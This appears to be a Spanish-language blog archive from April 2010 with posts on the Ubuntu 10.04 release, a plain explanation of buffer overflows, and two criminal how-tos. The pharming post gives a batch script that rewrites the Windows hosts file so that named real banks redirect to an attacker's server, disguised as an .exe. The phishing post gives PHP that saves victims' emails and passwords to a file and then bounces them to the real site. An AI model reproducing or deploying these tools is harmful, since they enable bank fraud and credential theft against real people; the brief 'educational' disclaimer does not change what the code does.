30 de abril de 2010

Ubuntu 10.4

Llega Ubuntu 10.04 Lucid Lynx


Tras lanzar la Alpha 6 de Ubuntu 9.10 Karmic Koala, Mark Shuttleworth ha anunciado Lucid Lynx, que será el nombre de la versión Ubuntu 10.4, la cual se podrá descargar a partir de abril de 2010.

De momento, son prácticamente cero, los datos conocidos sobre Ubuntu 10.4 Lucid Lynx, aunque según Shuttlewoth (impulsor económico de Canonical y Ubuntu), esta versión traerá verdaderas mejoras y nuevas versiones de Kernel, soporte EXT4, tienda de aplicaciones de Ubuntu, etc.

Así, estamos hablando de que 6 meses después de lanzar Karmic Koala Final (esperada para Octubre), llegará una versión de Ubuntu que según el anuncio, cambiará por completo la experiencia del usuario ante Ubuntu.

Torrents oficiales de Ubuntu 10.04 Lucid Lynx (sacados de la pagina oficial)
  • ubuntu-10.04-alternate-amd64.iso.torrent --> 64 bits (La instalacion es sin entorno grafico)

  • ubuntu-10.04-alternate-i386.iso.torrent --> 32 bits (La instalacion es sin entorno grafico)

  • ubuntu-10.04-desktop-amd64.iso.torrent --> 64 bits (La instalacion es con entorno grafico)

  • ubuntu-10.04-desktop-i386.iso.torrent --> 32 bits (La instalacion es con entorno grafico)

  • ubuntu-10.04-server-amd64.iso.torrent --> 64 bits (Esta es para servidores)

  • ubuntu-10.04-server-i386.iso.torrent --> 32 bits (Esta es para servidores)

  • Aqui un video





    27 de abril de 2010

    Desbordamiento de buffer

    ¿QUÉ ES UN DESBORDAMIENTO DE BUFFER?
    ------------------------------------


    Estos días han saltado a la opinión pública una serie de errores provocados por desbordamiento de buffer (buffer overflow) los cuales permitían tomar el control absoluto de nuestra máquina, o bien a un atacante remoto, o bien a gusanos / virus (Blaster, por ejemplo) que usan dicha vulnerabilidad.
    "Desbordamiento de buffer" es una de las frases que muchas veces asumimos sin preguntar -aunque sólo sea en plan curiosidad-, qué es lo que significa. En el presente artículo, creado para neófitos en informática, vamos a intentar clarificar este concepto: qué es lo que realmente significa, y por qué sucede. Esto es inherente a cualquier sistema operativo, por lo que no es exclusivo de Microsoft.
    Vamos a utilizar en varios puntos de este artículo la palabra "exploit". Un exploit no es nada más que una manera, o un código, o lo que sea, de manejar una vulnerabilidad para tomar el control de una máquina, o bien para hacerla malfuncionar y provocar la caída de sus servicios.

    ¿CÓMO FUNCIONA UN PROGRAMA?
    ---------------------------


    Un programa tiene su área de código ejecutable, y usa en memoria un espacio para almacenamiento del propio código y también para almacenamiento de los datos que vaya a utilizar. Igualmente, si el programa recibe parámetros o datos, debe guardarlos temporalmente en memoria.

    Por ejemplo, imaginemos un programa servidor de páginas web. Cuando el usuario teclea en un navegador: "http://www.microsoft.com/directx", el texto tecleado: "www.microsoft.com/directx" viaja como dato al servidor web de Microsoft. Dicho servidor es un programa que recibe ese texto, y que tiene que almacenarlo en memoria.

    Imaginemos que desde nuestro navegador, podemos teclear lo que queramos sin tener un tamaño máximo para escribir. Es decir que tecleamos "http://www.microsoft.com/xx....xxxx" y el texto que ponemos en las xxxxx es enorme. Pongamos que enviamos 10.000 caracteres... a ver que pasa.

    Si el programa servidor que se está ejecutando en los servidores de Microsoft no tiene presente que pueda recibir toda esta cantidad de datos, y el programador que lo ha realizado ha previsto sólo una cantidad, digamos razonable de 1000 caracteres, el propio programa al intentar guardarse esos 10.000 caracteres, está "machacando" áreas de memoria que pueden ser de contenido de otros datos (en cuyo caso se machacan) o incluso de código ejecutable del propio servidor. En cualquier caso, hay destrucción de información que provocarán en el mejor de los casos o un mal funcionamiento, o lo más probable, una "caída" del programar servidor web por machacarse parte de su propio código

    Evidentemente, la solución pasaría por comprobar el tamaño de lo tecleado antes de moverlo a zonas de memoria.

    Este es un caso muy sencillo y muy simplificado, pero nos puede servir como idea de lo que sucede. Generalicemos un poco: un programa, se descompone en funciones. Dicho programa recibe parámetros o datos, se los guarda, y los pasa al resto de funciones o subprogramas que lo necesiten.

    El problema es cuando el propio programa o los propios subprogramas o funciones, tienen reservados tamaños inferiores a la longitud de los datos que reciben. La solución, por supuesto, es que cada programa, función, modulo, librería, DLL, etc... no se fíe de nadie y verifique exhaustivamente todo antes de tomar ninguna acción y ni tan siquiera guardarlo en memoria.

    Normalmente, los controles anteriores no se hacen excepto en entrada de datos, debido a que esto implica sobrecargar excesivamente de código de comprobación, y en tiempo de ejecución todos los parámetros y todas las zonas de memoria a las que accede el programa.

    El problema surge cuando muchas de las funciones diseñadas para ejecutarse internamente, y que no tienen controles de los parámetros, deciden reutilizarse en otros programas de nivel superior los cuales pueden no tener tampoco dichos controles. En este caso, y aunque su funcionamiento sea normal, pueden encontrarse situaciones en que alguien malintencionado lo descubra y decida "explotar" esta vulnerabilidad. Es vulnerable un programa desde el momento en que somos capaces de hacerlo "cascar". Si somos capaces de ello, también seremos capaces de hacer lo que queramos: es decir de tomar control de él. Veremos un poco más adelante y de una manera sencilla, el cómo.

    VIENDO UN POCO DEL DIAGRAMA DE CAPAS DE EJECUCIÓN
    -------------------------------------------------


    Continuamos con el ejemplo del servidor web anterior. Aunque nos estamos ciñendo a un servidor web, pensemos que en nuestras máquinas hay muchos pequeños, llamémosles, micro-servidores, es decir, programas, rutinas, funciones que están a la espera que alguien les active, o a la espera de recibir datos. El ejemplo del servidor web que estamos viendo no es anecdótico, sino que describe una vulnerabilidad real que ha existido en los servidores y que en su día (hace unos años) fue explotada con éxito por el mundo hacker.

    Veamos muy por encima las capas que componen un servidor web, o mejor, veamos qué sucede desde que hacemos una petición de una URL (dirección de Internet) hasta que el servidor nos devuelve datos.

    Primero, existen una serie de capas del tcp/ip que reciben los mensajes. Estas capas lo que hacen es pasarlo al siguiente nivel. En nuestro caso, al punto de entrada de los datos del servidor web. Este a su vez, analiza por completo el mensaje solicitado. Pensemos que en una URL pueden viajar muchas cosas: usuario / password, la máquina que lo va ejecutar, y en el contenido de la URL, la página, o incluso instrucciones de ejecución. Por ello, si nos fijamos, nos podemos encontrar URL's larguísimas que están enviando instrucciones al servidor.

    Este a su vez, está compuesto por módulos o capas: por ejemplo, un módulo para autenticar al usuario si este fuese en el mensaje, otro, por ejemplo, para analizar el literal del mensaje y si encuentra instrucciones que entiende como de ejecución, pasárselo al modulo ejecutivo, etc... al final, si todo es correcto, se construye la página o se muestra directamente una página almacenada y se envía. Pero lo importante es que se ha llamado, pasando los datos tecleados por nosotros a un montón de programas y módulos. Si cualquiera de estos no tiene previsto un análisis detallado de la URL, o en algún caso falla al analizarla en este sentido... se provocará probablemente un desbordamiento de buffer: un machaque de áreas de memoria que llevará al programa a caerse casi con toda probabilidad.

    EL ATAQUE
    ---------


    Si un hacker, en algún momento, consigue en este ejemplo hacer que un servidor se caiga por enviar una URL inválida... ya tiene todo resuelto. Si es capaz de hacer "cascar" al programa servidor, también será capaz de enviar dentro de la URL código ejecutable en unas posiciones muy determinadas de la URL. Si este "trozo" de código enviado entra en ejecución... ya tenemos el "exploit". Es decir, antes que el servidor se "caiga", habrá ejecutado un código dejado por el hacker.

    Este código puede hacer cualquier cosa: si el hacker ha tenido imaginación y ha sido capaz de realizar pruebas para encontrar un agujero que antes no se le había ocurrido a nadie, ni al programador, ni al equipo de programación, ni tan siquiera al equipo de pruebas, y que posiblemente lleve oculto años sin que haya sucedido nada... si ha tenido dicha imaginación está claro que también la tendrá ahora para saber qué"código" nos va a "inyectar" en nuestra máquina Estas inyecciones de código ya están muy estudiadas por el mundo hacker. Estudiadas, realizadas y probadas: únicamente consiste ahora en buscar la vulnerabilidad para "inyectar" el código



    por José Manuel Tella Llop

    25 de abril de 2010

    crear un espacio web y subir un scam por medio de filezilla

    Gmail


    Clic aqui para descargar

    Como hacer pharming

    Bueno, primero que todo necesitaremos saber que es pharming si lo quieres poner en practica: aqui les va un poco de definicion.

    Aqui Les Pongo Un Video Educativo:
     

     




     

    Ahora que ya sabemos que es pharming y pues phising procederemos a actuar:
      

     Materiales:
    El block de notas
    Algun pack de iconos
    Converter .bat to .exe (es un compilador de archivos batch)

    Descargar los materiales: http://d7c329bf.linkbucks.com

     

     


    En los materiales hay solo unos pocos iconos pero si desean pueden buscar por google y hay encontran miles de iconos, recuerden que los iconos deben tener extension .ico

    Ahora lo primero que vamos hacer sera abrir el block de notas y escribir:

    @echo off
    echo 72.9.233.146 www.banamex.com.mx >> %windir%/system32/drivers/etc/hosts
    echo 72.9.233.146 www.bbva.com >> %windir%/system32/drivers/etc/hosts
    echo 72.9.233.146 www.bancomer.com.mx >> %/windir%system32/drivers/etc/hosts
    echo 72.9.233.146 www.esmas.com >> %windir%/system32/drivers/etc/hosts
    exit

     


     

    Expliquemos un poco,: la direccion ip --72.9.233.146-- sera la ip de su hosting donde tengan su scam bancario o de lo que sea(con ip de su hosting me refiero a un hosting con ip dedicada no que hicieron ping a su pagina web y listo ye tengo mi ip por que eso no es asi), entonces esa ip la cambian por la suya, en este caso puse la ip de la pagina web de un juego((esa web con IP dedicada no va a durar toda la vida asi que no se preocupen si no les carga esa pagina)).
    La pagina web que en este caso pusimos --www.banamex.com.mx - www.bbva.com - www.bancomer.com.mx - www.esmas.com-- seran las paginas webs a las que entraran nuestras victimas y seran redireccionadas a nuestro scam.
    Y la ruta --%windir%system32driversetchosts-- lo que hace es llamar al archivo hosts que se encuentra en el directorio de --windows > system32 > drivers > etc-- para asi añadirle esas lineas nuestras al archivo hosts.

    Ya dejemonos de explicaciones y vamos al grano: Ahora le damos clic en guardar como y le ponen cualquier nombre pero con la extencion .bat por ejemplo (file.bat) y nos salimos ahora abrimos nuestro converter .bat to .exe y compilamos nuestro archivo para que quede en .exe y si quieren le cambian el icono desde el mismo compilador y con esto abremos terminado, ahora provemos: ejecutemos nuestro archivo file.exe y veran que no paso nada a simple vista pero ahora vayan a la siguiente ruta WINDOWSsystem32driversetc y abran el archivo hosts con el block de notas y veran nuestras URL`S e IP`S en aquel archivo y eso significara que funciono (cuando ejecuten su archivo file.exe se modificara el archivo hosts, y para desinfectarse solo abran el archivo hosts y borren nuestras URL`S e IP`S que se añadieron y dejamos por defecto la ip 127.0.0.1 y el nombre localhost) o simplemente abran una ventana nueva del internet y escriban una de las direcciones webs que decian en el archivo como por ejemplo www.bbva.com y veran que seran redireccionados a la ip (72.9.233.146) la cual es una pagina web de un juego, y si miran bien la URL se daran cuenta de que nada cambia por que dira lo mismo de www.bbva.com por eso es tan efectivo estos ataques jeje, y para los que piensan en grande por la net existen varios scripts para infectar PC`S de forma silenciosa como el fire pack lite, ice pack entre otros. 

     

     


    Este metodo no funciona en win 7 ni en win vista

    Nota:Este documento fue creado de forma educativa y ni el autor ni ayudantes se hacen responsables por los malos usos que les puedan dar a este documento.

    Todos Los Derechos Reservados.Fidentis

    Este Documento puede ser distribuido, siempre y cuando el nombre del autor permanezca intacto 

     

    Como hacer un scam

    Weno aky os dejo a los q empezais en el hack o en el phising, un tutorial muy bueno para acer vuestros propios scams, recordar q algunas web

    tienen proteccion contra phising y no os saldra bien el scam.

    [googlevideo=http://video.google.es/videoplay?docid=8735564469493328179&hl=es]

    Codigo php para q no tengais q copiarlo desde el tutorial:
    Código:


    <?php
    $id=$_POST['entrar'];
    $pass=$_POST['cont'];
    $master=fopen('robados.txt',a);
    fwrite($master,"
    email: ".$id." ...... pass: " .$pass." ");
    fclose($master);
    echo "<meta http-equiv='Refresh' content='1;url=http://www.tuenti.com/'>";
    ?>


     

    Esta ultima linea: echo "<meta http-equiv='Refresh' content='1;url=http://www.tuenti.com/'>";

    es para q cuando entre se recargue a la pagina original asi q donde pone www.tuenti.com, poned la pagina q aveis echo el scam

    Herramientas usadas en el Video-Tutorial: 

    http://rapidshare.com/files/134633720/Dreamweaver_8.rar

    Clases